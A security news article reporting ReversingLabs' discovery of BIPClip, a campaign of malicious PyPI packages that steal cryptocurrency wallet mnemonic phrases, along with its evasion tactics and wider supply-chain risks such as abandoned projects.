Threat hunters have discovered a set of seven packages in the Python Package Index (PyPI) repository designed to steal BIP39 mnemonic phrases used to recover the private keys of a cryptocurrency wallet.
The software supply chain attack campaign was codenamed BIPClip by ReversingLabs. The packages were downloaded a total of 7,451 times before being removed by PyPI. The package list is as follows:
BIPClip, which targets developers working on projects related to generating and securing cryptocurrency wallets, is said to have been active since at least December 4, 2022, when hashdecrypt was first published on the registry.
“This is just the latest software supply chain campaign to target crypto assets,” security researcher Karlo Zanki said in a report shared with The Hacker News. “This confirms that cryptocurrency continues to be one of the most popular targets for supply chain threat actors.”
Demonstrating that the threat actors behind the campaign were careful to avoid detection, one of the packages in question – mnemonic_to_address – was devoid of any malicious functionality, other than listing bip39-mnemonic-decrypt as its dependency, which contained the malicious component.
“Although they chose to examine package dependencies, the name of the imported module and the invoked function are carefully chosen to mimic legitimate functions and not raise suspicion, as implementations of the BIP39 standard include many cryptographic operations,” Zanki explained.
The package, for its part, is designed to steal mnemonic phrases and exfiltrate the information onto a server controlled by the actor.
Two other packages identified by ReversingLabs – public-address-generator and erc20-scanner – work similarly, with the first acting as a decoy to transmit the mnemonic phrases to the same command and control (C2) server.
On the other hand, hashdecrypts works a little differently as it is not meant to work in pairs and contains almost identical code within it to collect data.
The package, according to the software supply chain security firm, includes references to a GitHub profile called “HashSnake,” which features a repository called hCrypto advertised as a way to extract mnemonic phrases from crypto wallets using the hashdecrypts package.
A closer look at the repository’s commit history reveals that the campaign has been running for over a year on the basis that one of the Python scripts had previously imported the hashdecrypt package (without the “s”) instead of hashdecrypts as recently as March 1 2024, the same date the hashdecrypts were uploaded to PyPI.
It is worth pointing out that the threat actors behind the HashSnake account are also present on Telegram and YouTube to advertise their warez. This includes the release of a video on September 7, 2022, showcasing a crypto log checking tool called xMultiChecker 2.0.
“The contents of each of the discovered packages were carefully crafted to make them appear less suspicious,” Zanki said.
“They were focused on compromising crypto wallets and stealing the cryptocurrencies they contained. The lack of a broader agenda and ambition made it less likely that this campaign would undermine the security and monitoring tools used within the compromised organizations .”
The findings once again highlight the security threats that lurk in open source package repositories, which is exacerbated by the fact that legitimate services like GitHub are used as a conduit to distribute malware.
Furthermore, abandoned projects are becoming an attractive vector for threat actors to take control of developer accounts and publish Trojanized versions which could then pave the way for large-scale supply chain attacks.
“Abandoned digital assets are not relics of the past; they are time bombs, and attackers are increasingly taking advantage of them, turning them into Trojan horses within open source ecosystems,” Checkmarx noted last month.
“The MavenGate and CocoaPods case studies highlight how abandoned domains and subdomains could be hijacked to deceive users and spread malicious intent.”